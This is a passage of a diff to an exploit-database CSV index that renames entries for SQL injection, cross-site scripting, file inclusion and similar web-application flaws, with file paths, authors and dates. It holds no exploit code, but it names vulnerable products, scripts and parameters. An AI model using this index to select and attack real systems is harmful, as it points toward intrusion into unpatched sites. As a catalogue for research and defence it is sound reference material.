'articleId' SQL Injection (1)",2006-11-18,"laurent gaffie",asp,webapps,0 +28963,platforms/php/webapps/28963.txt,"Bitweaver 1.x - 'fisheye/index.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 +28964,platforms/php/webapps/28964.txt,"Bitweaver 1.x - 'wiki/orphan_pages.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 +28965,platforms/php/webapps/28965.txt,"Bitweaver 1.x - 'wiki/list_pages.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28967,platforms/php/webapps/28967.txt,"ExoPHPDesk 1.2 - 'Pipe.php' Remote File Inclusion",2006-11-11,Firewall1954,php,webapps,0 28970,platforms/php/webapps/28970.txt,"WordPress Plugin Dexs PM System - Authenticated Persistent Cross-Site Scripting",2013-10-15,TheXero,php,webapps,80 -28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php sondage' Parameter SQL Injection",2013-10-15,drone,php,webapps,80 +28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php?sondage' SQL Injection",2013-10-15,drone,php,webapps,80 28972,platforms/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit)",2013-10-15,"Jason Kratzer",unix,webapps,0 28975,platforms/ios/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0 28976,platforms/ios/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - Local File Inclusion",2013-10-15,Vulnerability-Lab,ios,webapps,0 @@ -30911,23 +30912,23 @@ id,file,description,date,author,platform,type,port 28979,platforms/linux/webapps/28979.txt,"DornCMS Application 1.4 - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,linux,webapps,0 28980,platforms/php/webapps/28980.txt,"WordPress 2.0.5 - 'functions.php' Remote File Inclusion",2006-11-11,_ANtrAX_,php,webapps,0 28982,platforms/php/webapps/28982.txt,"cPanel 10 - seldir.html dir Parameter Cross-Site Scripting",2006-11-13,"Aria-Security Team",php,webapps,0 -28983,platforms/php/webapps/28983.txt,"cPanel 10 - 'newuser.html' Multiple Parameter Cross-Site Scripting",2006-11-13,"Aria-Security Team",php,webapps,0 +28983,platforms/php/webapps/28983.txt,"cPanel 10 - 'newuser.html' Multiple Cross-Site Scripting Vulnerabilities",2006-11-13,"Aria-Security Team",php,webapps,0 28985,platforms/asp/webapps/28985.txt,"20/20 Real Estate 3.2 - listings.asp SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0 28986,platforms/asp/webapps/28986.asp,"ASP Portal 2.0/3.x/4.0 - Default1.asp SQL Injection",2006-11-13,ajann,asp,webapps,0 28988,platforms/php/webapps/28988.txt,"Roundcube Webmail 0.1 - 'index.php' Cross-Site Scripting",2006-11-13,RSnake,php,webapps,0 -28989,platforms/asp/webapps/28989.txt,"INFINICART - search.asp search Parameter Cross-Site Scripting",2006-11-13,"laurent gaffie",asp,webapps,0 -28990,platforms/asp/webapps/28990.txt,"INFINICART - sendpassword.asp email Parameter Cross-Site Scripting",2006-11-13,"laurent gaffie",asp,webapps,0 -28991,platforms/asp/webapps/28991.txt,"INFINICART - 'login.asp' Multiple Parameter Cross-Site Scripting",2006-11-13,"laurent gaffie",asp,webapps,0 -28992,platforms/asp/webapps/28992.txt,"INFINICART - browse_group.asp groupid Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0 +28989,platforms/asp/webapps/28989.txt,"INFINICART - 'search.asp?search' Cross-Site Scripting",2006-11-13,"laurent gaffie",asp,webapps,0 +28990,platforms/asp/webapps/28990.txt,"INFINICART - 'sendpassword.asp?email' Cross-Site Scripting",2006-11-13,"laurent gaffie",asp,webapps,0 +28991,platforms/asp/webapps/28991.txt,"INFINICART - 'login.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-11-13,"laurent gaffie",asp,webapps,0 +28992,platforms/asp/webapps/28992.txt,"INFINICART - 'browse_group.asp?groupid' SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0 40373,platforms/cgi/webapps/40373.sh,"ASUS DSL-X11 ADSL Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 -28993,platforms/asp/webapps/28993.txt,"INFINICART - added_to_cart.asp ProductID Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0 -28994,platforms/asp/webapps/28994.txt,"INFINICART - 'browsesubcat.asp' Multiple Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0 +28993,platforms/asp/webapps/28993.txt,"INFINICART - 'added_to_cart.asp?ProductID' SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0 +28994,platforms/asp/webapps/28994.txt,"INFINICART - 'browsesubcat.asp' Multiple SQL Injections",2006-11-13,"laurent gaffie",asp,webapps,0 28995,platforms/php/webapps/28995.txt,"WebTester 5.x - Multiple Vulnerabilities",2013-10-16,X-Cisadane,php,webapps,80 29151,platforms/asp/webapps/29151.txt,"Link Exchange Lite 1.0 - Multiple SQL Injections",2006-11-21,"laurent gaffie",asp,webapps,0 -29152,platforms/asp/webapps/29152.txt,"JiRos Link Manager 1.0 - openlink.asp LinkID Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 -29153,platforms/asp/webapps/29153.txt,"JiRos Link Manager 1.0 - viewlinks.asp categoryId Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 -29154,platforms/asp/webapps/29154.txt,"CreaDirectory 1.2 - search.asp category Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 -29155,platforms/asp/webapps/29155.txt,"CreaDirectory 1.2 - addlisting.asp cat Parameter Cross-Site Scripting",2006-11-21,"laurent gaffie",asp,webapps,0 +29152,platforms/asp/webapps/29152.txt,"JiRos Link Manager 1.0 - 'openlink.asp?LinkID' SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 +29153,platforms/asp/webapps/29153.txt,"JiRos Link Manager 1.0 - 'viewlinks.asp?categoryId' SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 +29154,platforms/asp/webapps/29154.txt,"CreaDirectory 1.2 - 'search.asp?category' SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 +29155,platforms/asp/webapps/29155.txt,"CreaDirectory 1.2 - 'addlisting.asp?cat' Cross-Site Scripting",2006-11-21,"laurent gaffie",asp,webapps,0 28998,platforms/php/webapps/28998.txt,"PHPdebug 1.1 - 'Debug_test.php' Remote File Inclusion",2006-11-12,Firewall,php,webapps,0 28999,platforms/php/webapps/28999.txt,"DirectAdmin 1.28/1.29 - 'CMD_SHOW_RESELLER' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0 29000,platforms/php/webapps/29000.txt,"DirectAdmin 1.28/1.29 - 'CMD_SHOW_USER' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0 @@ -30943,9 +30944,9 @@ id,file,description,date,author,platform,type,port 29011,platforms/asp/webapps/29011.txt,"ASPIntranet 2.1 - default.asp SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0 29012,platforms/asp/webapps/29012.txt,"DMXReady Site Engine Manager 1.0 - index.asp SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0 29013,platforms/asp/webapps/29013.txt,"Pilot Cart 7.2 - Pilot.asp SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 -29014,platforms/asp/webapps/29014.txt,"Car Site Manager - 'csm/asp/listings.asp' Multiple Parameter SQL Injections",2006-11-14,"laurent gaffie",asp,webapps,0 -29015,platforms/asp/webapps/29015.txt,"Car Site Manager - csm/asp/detail.asp p Parameter SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 -29016,platforms/asp/webapps/29016.txt,"Car Site Manager - csm/asp/listings.asp Multiple Parameter Cross-Site Scripting",2006-11-14,"laurent gaffie",asp,webapps,0 +29014,platforms/asp/webapps/29014.txt,"Car Site Manager - 'csm/asp/listings.asp' Multiple SQL Injections",2006-11-14,"laurent gaffie",asp,webapps,0 +29015,platforms/asp/webapps/29015.txt,"Car Site Manager - 'csm/asp/detail.asp?p' SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 +29016,platforms/asp/webapps/29016.txt,"Car Site Manager - 'csm/asp/listings.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-11-14,"laurent gaffie",asp,webapps,0 29017,platforms/php/webapps/29017.txt,"Plesk 7.5/8.0 - get_password.php Cross-Site Scripting",2006-11-14,"David Vieira-Kurz",php,webapps,0 29018,platforms/php/webapps/29018.txt,"Plesk 7.5/8.0 - login_up.php3 Cross-Site Scripting",2006-11-14,"David Vieira-Kurz",php,webapps,0 29019,platforms/php/webapps/29019.txt,"Zikula CMS 1.3.5 - Multiple Vulnerabilities",2013-10-17,Vulnerability-Lab,php,webapps,0 @@ -30954,36 +30955,36 @@ id,file,description,date,author,platform,type,port 29023,platforms/php/webapps/29023.txt,"Woltlab Burning Board Regenbogenwiese 2007 Addon - SQL Injection",2013-10-17,"Easy Laster",php,webapps,0 29024,platforms/asp/webapps/29024.txt,"Inventory Manager - Multiple Input Validation Vulnerabilities",2006-11-14,"laurent gaffie",asp,webapps,0 29025,platforms/asp/webapps/29025.txt,"Evolve Merchant - viewcart.asp SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 -29026,platforms/php/webapps/29026.txt,"Mega Mall - product_review.php Multiple Parameter SQL Injection",2006-11-14,"laurent gaffie",php,webapps,0 -29027,platforms/php/webapps/29027.txt,"Mega Mall - order-track.php orderNo Parameter SQL Injection",2006-11-14,"laurent gaffie",php,webapps,0 -29028,platforms/asp/webapps/29028.txt,"MGinternet Property Site Manager - listings.asp s Parameter Cross-Site Scripting",2006-11-14,"laurent gaffie",asp,webapps,0 -29029,platforms/asp/webapps/29029.txt,"MGinternet Property Site Manager - detail.asp p Parameter SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 -29030,platforms/asp/webapps/29030.txt,"MGinternet Property Site Manager - listings.asp Multiple Parameter SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 -29031,platforms/asp/webapps/29031.txt,"MGinternet Property Site Manager - admin_login.asp Multiple Field SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 -29034,platforms/multiple/webapps/29034.txt,"Elite Graphix ElitCMS 1.01 & PRO - Multiple Web Vulnerabilities",2013-10-18,Vulnerability-Lab,multiple,webapps,0 -29037,platforms/asp/webapps/29037.txt,"CandyPress Store 3.5.2 14 - openPolicy.asp policy Parameter SQL Injection",2006-11-15,"laurent gaffie",asp,webapps,0 -29038,platforms/asp/webapps/29038.txt,"CandyPress Store 3.5.2 14 - prodList.asp brand Parameter SQL Injection",2006-11-15,"laurent gaffie",asp,webapps,0 +29026,platforms/php/webapps/29026.txt,"Mega Mall - 'product_review.php' Multiple SQL Injections",2006-11-14,"laurent gaffie",php,webapps,0 +29027,platforms/php/webapps/29027.txt,"Mega Mall - 'order-track.php?orderNo' SQL Injection",2006-11-14,"laurent gaffie",php,webapps,0 +29028,platforms/asp/webapps/29028.txt,"MGinternet Property Site Manager - 'listings.asp?s' Cross-Site Scripting",2006-11-14,"laurent gaffie",asp,webapps,0 +29029,platforms/asp/webapps/29029.txt,"MGinternet Property Site Manager - 'detail.asp?p' SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 +29030,platforms/asp/webapps/29030.txt,"MGinternet Property Site Manager - 'listings.asp' Multiple SQL Injections",2006-11-14,"laurent gaffie",asp,webapps,0 +29031,platforms/asp/webapps/29031.txt,"MGinternet Property Site Manager - 'admin_login.asp' Multiple SQL Injections",2006-11-14,"laurent gaffie",asp,webapps,0 +29034,platforms/multiple/webapps/29034.txt,"Elite Graphix ElitCMS 1.01 / PRO - Multiple Web Vulnerabilities",2013-10-18,Vulnerability-Lab,multiple,webapps,0 +29037,platforms/asp/webapps/29037.txt,"CandyPress Store 3.5.2 14 - 'openPolicy.asp?policy' SQL Injection",2006-11-15,"laurent gaffie",asp,webapps,0 +29038,platforms/asp/webapps/29038.txt,"CandyPress Store 3.5.2 14 - 'prodList.asp?brand' SQL Injection",2006-11-15,"laurent gaffie",asp,webapps,0 29040,platforms/asp/webapps/29040.txt,"High Performance Computers Solutions Shopping Cart - Multiple SQL Injections",2006-11-14,"laurent gaffie",asp,webapps,0 29041,platforms/asp/webapps/29041.txt,"Yetihost Helm 3.2.10 - Multiple Cross-Site Scripting Vulnerabilities",2006-11-15,"Aria-Security Team",asp,webapps,0 -29042,platforms/asp/webapps/29042.txt,"Dragon Internet Events Listing 2.0.01 - venue_detail.asp VenueID Parameter SQL Injection",2006-11-15,"Benjamin Moss",asp,webapps,0 -29043,platforms/asp/webapps/29043.txt,"Dragon Internet Events Listing 2.0.01 - event_searchdetail.asp ID Parameter SQL Injection",2006-11-15,"Benjamin Moss",asp,webapps,0 +29042,platforms/asp/webapps/29042.txt,"Dragon Internet Events Listing 2.0.01 - 'venue_detail.asp?VenueID' SQL Injection",2006-11-15,"Benjamin Moss",asp,webapps,0 +29043,platforms/asp/webapps/29043.txt,"Dragon Internet Events Listing 2.0.01 - 'event_searchdetail.asp?ID' SQL Injection",2006-11-15,"Benjamin Moss",asp,webapps,0 29044,platforms/asp/webapps/29044.txt,"Dragon Internet Events Listing 2.0.01 - 'admin_login.asp' Multiple Field SQL Injections",2006-11-15,"Benjamin Moss",asp,webapps,0 29046,platforms/asp/webapps/29046.txt,"ASPIntranet 2.1 - Multiple SQL Injections",2006-11-15,"Aria-Security Team",asp,webapps,0 29047,platforms/php/webapps/29047.txt,"Hot Links - Perl PHP Information Disclosure",2006-11-15,hack2prison,php,webapps,0 -29048,platforms/asp/webapps/29048.txt,"i-Gallery 3.4 - igallery.asp Multiple Parameter Cross-Site Scripting",2006-11-16,"Aria-Security Team",asp,webapps,0 +29048,platforms/asp/webapps/29048.txt,"i-Gallery 3.4 - 'igallery.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,"Aria-Security Team",asp,webapps,0 29049,platforms/php/webapps/29049.txt,"BlogTorrent Preview 0.92 - Announce.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0 29050,platforms/php/webapps/29050.txt,"Odysseus Blog 1.0 - blog.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0 29051,platforms/php/webapps/29051.txt,"Sphpblog 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,the_Edit0r,php,webapps,0 41035,platforms/php/webapps/41035.txt,"Airbnb Clone Script - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0 -29053,platforms/asp/webapps/29053.txt,"Image Gallery with Access Database - dispimage.asp id Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 -29054,platforms/asp/webapps/29054.txt,"Image Gallery with Access Database - 'default.asp' Multiple Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 -29058,platforms/php/webapps/29058.txt,"phpMyAdmin 2.x - db_create.php db Parameter Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0 -29059,platforms/php/webapps/29059.txt,"phpMyAdmin 2.x - db_operations.php Multiple Parameter Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0 -29060,platforms/php/webapps/29060.txt,"phpMyAdmin 2.x - querywindow.php Multiple Parameter Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0 -29061,platforms/php/webapps/29061.txt,"phpMyAdmin 2.x - sql.php pos Parameter Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0 -29062,platforms/php/webapps/29062.txt,"phpMyAdmin 2.x - Multiple Script Array Handling Full Path Disclosure",2006-09-15,"laurent gaffie",php,webapps,0 -29063,platforms/asp/webapps/29063.txt,"Xtreme ASP Photo Gallery 2.0 - displaypic.asp sortorder Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 -29064,platforms/asp/webapps/29064.txt,"Xtreme ASP Photo Gallery 2.0 - displaypic.asp catname Parameter Cross-Site Scripting",2006-11-16,"Aria-Security Team",asp,webapps,0 +29053,platforms/asp/webapps/29053.txt,"Image Gallery with Access Database - 'dispimage.asp?id' SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 +29054,platforms/asp/webapps/29054.txt,"Image Gallery with Access Database - 'default.asp' Multiple SQL Injections",2006-11-16,"Aria-Security Team",asp,webapps,0 +29058,platforms/php/webapps/29058.txt,"phpMyAdmin 2.x - 'db_create.php?db' Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0 +29059,platforms/php/webapps/29059.txt,"phpMyAdmin 2.x - 'db_operations.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"laurent gaffie",php,webapps,0 +29060,platforms/php/webapps/29060.txt,"phpMyAdmin 2.x - 'querywindow.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"laurent gaffie",php,webapps,0 +29061,platforms/php/webapps/29061.txt,"phpMyAdmin 2.x - 'sql.php?pos' Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0 +29062,platforms/php/webapps/29062.txt,"phpMyAdmin 2.x - Multiple Script Array Handling Full Path Disclosures",2006-09-15,"laurent gaffie",php,webapps,0 +29063,platforms/asp/webapps/29063.txt,"Xtreme ASP Photo Gallery 2.0 - 'displaypic.asp?sortorder' SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 +29064,platforms/asp/webapps/29064.txt,"Xtreme ASP Photo Gallery 2.0 - 'displaypic.asp?catname' Cross-Site Scripting",2006-11-16,"Aria-Security Team",asp,webapps,0 29065,platforms/php/webapps/29065.txt,"WHMCompleteSolution (WHMCS) 5.2.8 - SQL Injection",2013-10-19,g00n,php,webapps,0 29150,platforms/php/webapps/29150.txt,"WordPress Theme SAICO 1.0 < 1.0.2 - Arbitrary File Upload",2013-10-24,"Byakuya Kouta",php,webapps,0 29221,platforms/cgi/webapps/29221.txt,"BlueSocket BSC 2100 5.0/5.1 - Admin.pl Cross-Site Scripting",2006-12-04,"Jesus Olmos Gonzalez",cgi,webapps,0 @@ -30994,53 +30995,53 @@ id,file,description,date,author,platform,type,port 29073,platforms/asp/webapps/29073.txt,"ASPCart 4.5 - Multiple SQL Injections",2006-11-17,"laurent gaffie",asp,webapps,0 29074,platforms/asp/webapps/29074.txt,"20/20 Real Estate 3.2 - Multiple SQL Injections",2006-11-17,"laurent gaffie",asp,webapps,0 29075,platforms/asp/webapps/29075.txt,"20/20 Auto Gallery 3.2 - Multiple SQL Injections",2006-11-17,"laurent gaffie",asp,webapps,0 -29077,platforms/asp/webapps/29077.txt,"20/20 Applications Data Shed 1.0 - f-email.asp itemID Parameter SQL Injection",2006-11-17,"laurent gaffie",asp,webapps,0 -29078,platforms/asp/webapps/29078.txt,"20/20 Applications Data Shed 1.0 - 'listings.asp' Multiple Parameter SQL Injections",2006-11-17,"laurent gaffie",asp,webapps,0 +29077,platforms/asp/webapps/29077.txt,"20/20 Applications Data Shed 1.0 - 'f-email.asp?itemID' SQL Injection",2006-11-17,"laurent gaffie",asp,webapps,0 +29078,platforms/asp/webapps/29078.txt,"20/20 Applications Data Shed 1.0 - 'listings.asp' Multiple SQL Injections",2006-11-17,"laurent gaffie",asp,webapps,0 29079,platforms/php/webapps/29079.txt,"vBulletin 3.6.x - Admin Control Panel index.php Multiple Cross-Site Scripting Vulnerabilities",2006-11-17,insanity,php,webapps,0 29080,platforms/asp/webapps/29080.txt,"BestWebApp Dating Site Login Component - Multiple Field SQL Injections",2006-11-17,"laurent gaffie",asp,webapps,0 -29081,platforms/asp/webapps/29081.txt,"BestWebApp Dating Site - login_form.asp msg Parameter Cross-Site Scripting",2006-11-17,"laurent gaffie",asp,webapps,0 -29085,platforms/asp/webapps/29085.txt,"Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection (1)",2006-11-18,"laurent gaffie",asp,webapps,0 -29084,platforms/asp/webapps/29084.txt,"A-Cart Pro 2.0 - product.asp ProductID Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 -29087,platforms/asp/webapps/29087.txt,"ActiveNews Manager - 'page' Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 -29088,platforms/asp/webapps/29088.txt,"ActiveNews Manager - 'query' Parameter Cross-Site Scripting",2006-11-18,"laurent gaffie",asp,webapps,0 -29089,platforms/asp/webapps/29089.txt,"Active News Manager - 'catID' Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 -29090,platforms/asp/webapps/29090.txt,"ActiveNews Manager - 'articleId' Parameter SQL Injection (2)",2006-11-18,"laurent gaffie",asp,webapps,0 +29081,platforms/asp/webapps/29081.txt,"BestWebApp Dating Site - 'login_form.asp?msg' Cross-Site Scripting",2006-11-17,"laurent gaffie",asp,webapps,0 +29085,platforms/asp/webapps/29085.txt,"Alan Ward A-CART 2.0 - 'category.asp?catcode' SQL Injection (1)",2006-11-18,"laurent gaffie",asp,webapps,0 +29084,platforms/asp/webapps/29084.txt,"A-Cart Pro 2.0 - 'product.asp?ProductID' SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 +29087,platforms/asp/webapps/29087.txt,"ActiveNews Manager - 'page' SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 +29088,platforms/asp/webapps/29088.txt,"ActiveNews Manager - 'query' Cross-Site Scripting",2006-11-18,"laurent gaffie",asp,webapps,0 +29089,platforms/asp/webapps/29089.txt,"Active News Manager - 'catID' SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 +29090,platforms/asp/webapps/29090.txt,"ActiveNews Manager - 'articleId' SQL Injection (2)",2006-11-18,"laurent gaffie",asp,webapps,0 29091,platforms/php/webapps/29091.txt,"ZonPHP 2.25 - Remote Code Execution (Remote Code Execution)",2013-10-20,"Halim Cruzito",php,webapps,0 -29156,platforms/asp/webapps/29156.txt,"CreaDirectory 1.2 - search.asp search Parameter Cross-Site Scripting",2006-11-21,"laurent gaffie",asp,webapps,0 +29156,platforms/asp/webapps/29156.txt,"CreaDirectory 1.2 - 'search.asp?search' Cross-Site Scripting",2006-11-21,"laurent gaffie",asp,webapps,0 29211,platforms/php/webapps/29211.txt,"WordPress Theme Curvo - Cross-Site Request Forgery / Arbitrary File Upload",2013-10-26,"Byakuya Kouta",php,webapps,0 -29118,platforms/asp/webapps/29118.txt,"Enthrallweb eClassifieds - 'ad.asp' Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29093,platforms/asp/webapps/29093.txt,"Texas Rankem - 'selPlayer' Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 -29094,platforms/asp/webapps/29094.txt,"Texas Rankem - 'tournament_id' Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 +29118,platforms/asp/webapps/29118.txt,"Enthrallweb eClassifieds - 'ad.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",asp,webapps,0 +29093,platforms/asp/webapps/29093.txt,"Texas Rankem - 'selPlayer' SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 +29094,platforms/asp/webapps/29094.txt,"Texas Rankem - 'tournament_id' SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 29095,platforms/php/webapps/29095.txt,"Blog:CMS 4.1.3 - list.php Cross-Site Scripting",2006-11-18,Katatafish,php,webapps,0 40372,platforms/cgi/webapps/40372.sh,"COMTREND ADSL Router CT-5367 C01_R12 / CT-5624 C01_R03 - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 29097,platforms/php/webapps/29097.txt,"Boonex 2.0 Dolphin - 'index.php' Remote File Inclusion",2006-11-20,S.W.A.T.,php,webapps,0 -29098,platforms/php/webapps/29098.txt,"BirdBlog 1.4 - '/admin/admincore.php msg' Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 -29099,platforms/php/webapps/29099.txt,"BirdBlog 1.4 - '/admin/comments.php month' Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 -29100,platforms/php/webapps/29100.txt,"BirdBlog 1.4 - '/admin/entries.php month' Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 -29101,platforms/php/webapps/29101.txt,"BirdBlog 1.4 - '/admin/logs.php page' Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 -29103,platforms/asp/webapps/29103.txt,"vSpin Classified System 2004 - cat.asp cat Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29104,platforms/asp/webapps/29104.txt,"vSpin Classified System 2004 - search.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29105,platforms/asp/webapps/29105.txt,"vSpin Classified System 2004 - cat.asp catname Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 -29106,platforms/asp/webapps/29106.txt,"vSpin Classified System 2004 - search.asp minprice Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 -29107,platforms/asp/webapps/29107.txt,"Grandora Rialto 1.6 - '/admin/default.asp' Multiple Field SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29108,platforms/asp/webapps/29108.txt,"Grandora Rialto 1.6 - listfull.asp ID Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29109,platforms/asp/webapps/29109.txt,"Grandora Rialto 1.6 - listmain.asp cat Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29110,platforms/asp/webapps/29110.txt,"Grandora Rialto 1.6 - printmain.asp ID Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29111,platforms/asp/webapps/29111.txt,"Grandora Rialto 1.6 - 'searchkey.asp' Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29112,platforms/asp/webapps/29112.txt,"Grandora Rialto 1.6 - 'searchmain.asp' Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29113,platforms/asp/webapps/29113.txt,"Grandora Rialto 1.6 - 'searchoption.asp' Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29114,platforms/asp/webapps/29114.txt,"Grandora Rialto 1.6 - listmain.asp cat Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 -29115,platforms/asp/webapps/29115.txt,"Grandora Rialto 1.6 - searchkey.asp Keyword Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 -29116,platforms/asp/webapps/29116.txt,"Grandora Rialto 1.6 - searchmain.asp cat Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 -29117,platforms/asp/webapps/29117.txt,"Grandora Rialto 1.6 - forminfo.asp refno Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 -29119,platforms/asp/webapps/29119.txt,"Enthrallweb eClassifieds - dircat.asp cid Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29120,platforms/asp/webapps/29120.txt,"Enthrallweb eClassifieds - dirSub.asp sid Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29121,platforms/asp/webapps/29121.txt,"Enthrallweb eHomes - homeDetail.asp AD_ID Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29122,platforms/asp/webapps/29122.txt,"Enthrallweb eHomes - 'compareHomes.asp' Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29123,platforms/asp/webapps/29123.txt,"Enthrallweb eHomes - 'result.asp' Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29124,platforms/asp/webapps/29124.txt,"Enthrallweb eHomes - result.asp Multiple Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 +29098,platforms/php/webapps/29098.txt,"BirdBlog 1.4 - '/admin/admincore.php?msg' Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 +29099,platforms/php/webapps/29099.txt,"BirdBlog 1.4 - '/admin/comments.php?month' Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 +29100,platforms/php/webapps/29100.txt,"BirdBlog 1.4 - '/admin/entries.php?month' Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 +29101,platforms/php/webapps/29101.txt,"BirdBlog 1.4 - '/admin/logs.php?page' Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 +29103,platforms/asp/webapps/29103.txt,"vSpin Classified System 2004 - 'cat.asp?cat' SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 +29104,platforms/asp/webapps/29104.txt,"vSpin Classified System 2004 - 'search.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",asp,webapps,0 +29105,platforms/asp/webapps/29105.txt,"vSpin Classified System 2004 - 'cat.asp?catname' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 +29106,platforms/asp/webapps/29106.txt,"vSpin Classified System 2004 - 'search.asp?minprice' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 +29107,platforms/asp/webapps/29107.txt,"Grandora Rialto 1.6 - '/admin/default.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",asp,webapps,0 +29108,platforms/asp/webapps/29108.txt,"Grandora Rialto 1.6 - 'listfull.asp?ID' SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 +29109,platforms/asp/webapps/29109.txt,"Grandora Rialto 1.6 - 'listmain.asp?cat' SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 +29110,platforms/asp/webapps/29110.txt,"Grandora Rialto 1.6 - 